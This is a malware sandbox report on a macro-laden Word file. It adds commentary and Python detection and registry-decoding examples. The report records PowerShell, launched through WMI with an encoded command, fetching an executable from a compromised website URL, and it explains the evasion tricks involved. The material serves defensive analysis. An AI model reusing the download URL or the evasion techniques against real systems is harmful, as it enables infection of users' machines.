| Field | Value |
|---|---|
| File name | _wA14B_.doc |
| Full analysis | https://app.any.run/tasks/ef46968c-96b2-4412-8c83-55028d67d2d1 |
| Verdict | Malicious activity |
| Analysis date | April 15, 2019, 13:59:16 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | — |
| Indicators | — |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Apr 11 15:13:00 2019, Last Saved Time/Date: Thu Apr 11 15:13:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0 |
| MD5 | 73B64833C9635C4663980157CFBEB57E |
| SHA1 | A1B01160E46F2DE6BE42B18E190C409D440CE5B8 |
| SHA256 | 4C7B0B5822F8CD27A1EA3AC6BA131D5D1084EEB50AE311721024BEFDF5591506 |
| SSDEEP | 3072:L4eOY5CTsdAORqsfRa5y2585vjVhjU7J/FszYp+rLCU/:LTbw58fBCJ/FsnLCU/ |
| Extension | TrID identification (match score) |
|---|---|
| .doc | Microsoft Word document (54.2) |
| .doc | Microsoft Word document (old ver.) (32.2) |
| Property | Value |
|---|---|
| CompObjUserType | Microsoft Word 97-2003 Document |
| CompObjUserTypeLen | 32 |
| HeadingPairs | — |
| TitleOfParts | — |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 16 |
| CharCountWithSpaces | 7 |
| Paragraphs | 1 |
| Lines | 1 |
| Company | — |
| CodePage | Windows Latin 1 (Western European) |
| Security | None |
| Characters | 7 |
| Words | 1 |
| Pages | 1 |
| ModifyDate | 2019:04:11 14:13:00 |
| CreateDate | 2019:04:11 14:13:00 |
| TotalEditTime | — |
| Software | Microsoft Office Word |
| RevisionNumber | 1 |
| LastModifiedBy | — |
| Template | Normal.dotm |
| Comments | — |
| Keywords | — |
| Author | — |
| Subject | — |
| Title | — |

Two things in this metadata are worth noting before reading the behaviour below. First, the document body is essentially empty (1 word, 7 characters, 1 page) and every authorship field is blank, while AppVersion 16 shows it was produced with Office 2016 and deliberately saved in the legacy Word 97-2003 binary format; the activity in the rest of the report therefore comes from code carried in the file, not from its text (Word writing Temp\VBE\MSForms.exd in the file table is what happens when a VBA project that uses MSForms controls is loaded). Second, the one-hour difference between the Create/Modify dates here (14:13) and in the File info line above (15:13) is the two parsers rendering the same OLE timestamp in different time zones, not evidence of a second save; RevisionNumber 1 with identical create and modify times means the file was saved once.
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 1248 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\_wA14B_.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
| 2240 | PoWeRsHelL -e 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 | C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe | — | WmiPrvSE.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| 3080 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | PoWeRsHelL.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: NTVDM.EXE; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
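Three details of this process tree carry the detection value. The parent of PowerShell (PID 2240) is WmiPrvSE.exe, the WMI provider host, not WINWORD.EXE: the document created the process through WMI (Win32_Process.Create), which breaks the Word-to-PowerShell parent-child link that the most common Office-macro detections key on. The command line spells the binary as PoWeRsHelL and passes the payload with the abbreviated -e (EncodedCommand) switch, both of which defeat naive case-sensitive string matches. And ntvdm.exe appearing as a child of PowerShell on a 32-bit Windows 7 host means PowerShell tried to execute a file that was not a valid Win32 image, so Windows handed it to the 16-bit subsystem; the file table below shows the downloaded 454.exe was identified as HTML, consistent with the server returning a page rather than the executable. The following Python is an added example (not part of the ANY.RUN report) that encodes those three checks as process-creation rules and runs them over the events from this report; the event records are constructed from the table above, and the base64 string that the report redacts is replaced by a placeholder:

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the created process image
    cmdline: str        # command line as logged
    parent_image: str   # basename of the parent's image


# Constructed from the process table in the report above. The encoded
# PowerShell command is not reproduced on the page, so a placeholder stands in.
EVENTS = [
    ProcEvent(1248, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\_wA14B_.doc"',
              "explorer.exe"),
    ProcEvent(2240, r"C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe",
              "PoWeRsHelL -e <base64-not-reproduced>", "WmiPrvSE.exe"),
    ProcEvent(3080, r"C:\Windows\system32\ntvdm.exe",
              r'"C:\Windows\system32\ntvdm.exe" -i1', "PoWeRsHelL.exe"),
]

# Script/command hosts that should not normally be children of the WMI provider host.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Spellings of "powershell" that legitimate tooling actually produces.
CONVENTIONAL = {"powershell", "PowerShell", "POWERSHELL", "Powershell"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def tokens(cmdline: str) -> list:
    # Keep quoted paths together, split the rest on whitespace.
    return re.findall(r'"[^"]*"|\S+', cmdline)


def is_encoded_switch(tok: str) -> bool:
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand
    # (-e, -en, -enc, ...) plus the -ec alias; -ex would be -ExecutionPolicy.
    if not tok.startswith("-"):
        return False
    t = tok[1:].lower()
    return t == "ec" or (t.startswith("e") and "encodedcommand".startswith(t))


def analyze(ev: ProcEvent) -> list:
    findings = []
    img = basename(ev.image).lower()
    parent = ev.parent_image.lower()
    toks = tokens(ev.cmdline)

    # 1. A script host created by WmiPrvSE.exe: Win32_Process.Create from a client
    #    that wants to hide its real parent (here, the Word process).
    if parent == "wmiprvse.exe" and img in SCRIPT_HOSTS:
        findings.append("wmi_spawned_script_host")

    if img == "powershell.exe":
        # 2a. Encoded command on the command line.
        if any(is_encoded_switch(t) for t in toks):
            findings.append("encoded_command")
        # 2b. Image name typed with scrambled case (PoWeRsHelL) to dodge string matches.
        head = basename(toks[0].strip('"')) if toks else ""
        stem = re.sub(r"\.exe$", "", head, flags=re.I)
        if stem.lower() == "powershell" and stem not in CONVENTIONAL:
            findings.append("case_mangled_image_name")

    # 3. ntvdm.exe launched by a script host: the script ran an "executable"
    #    that was not a valid PE, so Windows treated it as a 16-bit program.
    if img == "ntvdm.exe" and parent in SCRIPT_HOSTS:
        findings.append("ntvdm_from_script_host")
    return findings


def triage(events: list) -> dict:
    """Map each PID to the list of rule names it triggered."""
    return {ev.pid: analyze(ev) for ev in events}


if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, hits or "-")
```

Run against the three events, PID 1248 triggers nothing, PID 2240 triggers all three PowerShell rules and PID 3080 the ntvdm rule. The WMI rule is the one to keep even where the others are tuned out: WmiPrvSE.exe creating a command or script host is rare on workstations and is exactly the link the attacker was trying to hide.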
| PID | Process | Operation | Key | Name | Value |
|---|---|---|---|---|---|
| 1248 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | sz4 | 737A3400E0040000010000000000000000000000 |
| 1248 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | Off |
| 1248 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | On |
| 1248 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | WORDFiles | 1317994526 |
| 1248 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1317994640 |
| 1248 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1317994641 |
| 1248 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | MTTT | E004000084EAD77993F3D40100000000 |
| 1248 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | w\|4 | 777C3400E004000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 |
| 1248 | WINWORD.EXE | delete value | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | w\|4 | 777C3400E004000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 |
| 1248 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0 |
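All of these writes are Word's own housekeeping rather than actions of the malicious code, but the binary values are still worth decoding because they tie the registry timeline to the process tree. The two Resiliency\StartupItems values and MTTT all begin with the DWORD E0040000, which is 1248 little-endian, the PID of this WINWORD.EXE; the w|4 value carries a UTF-16LE path (Normal.dotm) that Word records while loading a startup item and deletes again once the load succeeds, which is why the same value is written and then removed; and MTTT carries a FILETIME. The decoder below is an added example, not part of the report or of any Microsoft documentation: the field layout it assumes (4-byte tag, 4-byte PID, 4-byte type, 4-byte reserved, blob length, then a count and byte-length DWORD pair in front of the UTF-16LE string; PID followed by a 64-bit FILETIME for MTTT) is inferred from the three values on the page, and the sample hex is copied from the table above:

```python
import struct
from datetime import datetime, timedelta, timezone

# Constructed from the registry table above (values copied verbatim).
STARTUP_ITEMS = {
    "sz4": "737A3400E0040000010000000000000000000000",
    "w|4": "777C3400E004000004000000000000008C0000000100000084000000"
           "3E0043003A005C00550073006500720073005C00"      # >C:\Users\
           "610064006D0069006E005C00"                      # admin\
           "41007000700044006100740061005C00"              # AppData\
           "52006F0061006D0069006E0067005C00"              # Roaming\
           "4D006900630072006F0073006F00660074005C00"      # Microsoft\
           "540065006D0070006C0061007400650073005C00"      # Templates\
           "4E006F0072006D0061006C002E0064006F0074006D00"  # Normal.dotm
           "000000000000",                                 # terminator/padding
}
MTTT = "E004000084EAD77993F3D40100000000"

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    # FILETIME counts 100 ns intervals since 1601-01-01 UTC.
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def decode_startup_item(hexval: str) -> dict:
    """Decode one Word Resiliency\\StartupItems value.

    Layout assumed (inferred from the two values on the page, not documented):
      0  char[4]  tag, NUL padded (matches the value name)
      4  DWORD    PID of the Word process that wrote it
      8  DWORD    item type (1 for sz4, 4 for w|4; meaning not established)
      12 DWORD    reserved / zero
      16 DWORD    length of the trailing blob (0 when there is none)
      20 DWORD    count (1)
      24 DWORD    byte length of the UTF-16LE string that follows
    """
    raw = bytes.fromhex(hexval)
    tag = raw[:4].split(b"\x00", 1)[0].decode("ascii")
    pid, kind, _reserved, blob_len = struct.unpack_from("<IIII", raw, 4)
    path = None
    if blob_len:
        _count, str_len = struct.unpack_from("<II", raw, 20)
        path = raw[28:28 + str_len].decode("utf-16-le").rstrip("\x00")
    return {"tag": tag, "pid": pid, "kind": kind, "path": path}


def decode_mttt(hexval: str) -> dict:
    """Decode the MTTT value: DWORD PID, 64-bit FILETIME, DWORD padding (assumed)."""
    pid, ft, _pad = struct.unpack("<IQI", bytes.fromhex(hexval))
    return {"pid": pid, "time": filetime_to_datetime(ft)}


if __name__ == "__main__":
    for name, hexval in STARTUP_ITEMS.items():
        print(name, decode_startup_item(hexval))
    print("MTTT", decode_mttt(MTTT))
```

Both StartupItems entries and MTTT decode to PID 1248, and the MTTT FILETIME decodes to 2019-04-15 13:59 UTC, about half a minute after the analysis start shown at the top of the report, which confirms these writes belong to this run of Word rather than to an earlier state of the sandbox image. The path in w|4 carries a leading ">" character in the stored string; the decoder keeps it so that the output reflects the raw value.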
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 1248 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR66E3.tmp.cvr | — | — | — |
| 2240 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ILXDDVQCS8G90K91FD1X.temp | — | — | — |
| 3080 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs1757.tmp | — | — | — |
| 3080 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs1758.tmp | — | — | — |
| 1248 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 383A8130CDB60F3E4A95F367EFA53855 | C7780AD65D218C93224BC5A09D31AD767AB3886D98949DB991C67CD57CCB6214 |
| 1248 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | D2E15D5C604345F8015FBF3360A0E0AC | 1F21FE58E7748D2F29BC412D23F15565CB01B44D017CC45BB01701708A9978D6 |
| 2240 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
| 2240 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe779d.TMP | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
| 1248 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$wA14B_.doc | pgc | 6FE1B71DE077F5CD7ED389F6628E0319 | EAFF05C240197B3203ADAF8368CCC29A3740E6C68A292EE5BBA0D6DEBEFF3230 |
| 2240 | PoWeRsHelL.exe | C:\Users\admin\454.exe | html | 3F6BB11DD1EF460042BAF2F5ACE022C6 | E432165CDD35228FAAD8E8AC50BA40C95EA2BB499D431270A17F0D91D56DD4D3 |
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 2240 | PoWeRsHelL.exe | GET | — | 23.229.231.230:80 | http://chistyshifaclinic.com/administrator/modules/mod_multilangstatus/language/verizon-bill-1.content.exe | US | — | — | unknown |

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 2240 | PoWeRsHelL.exe | 23.229.231.230:80 | chistyshifaclinic.com | GoDaddy.com, LLC | US | unknown |

| Domain | IP | Reputation |
|---|---|---|
| chistyshifaclinic.com | — | unknown |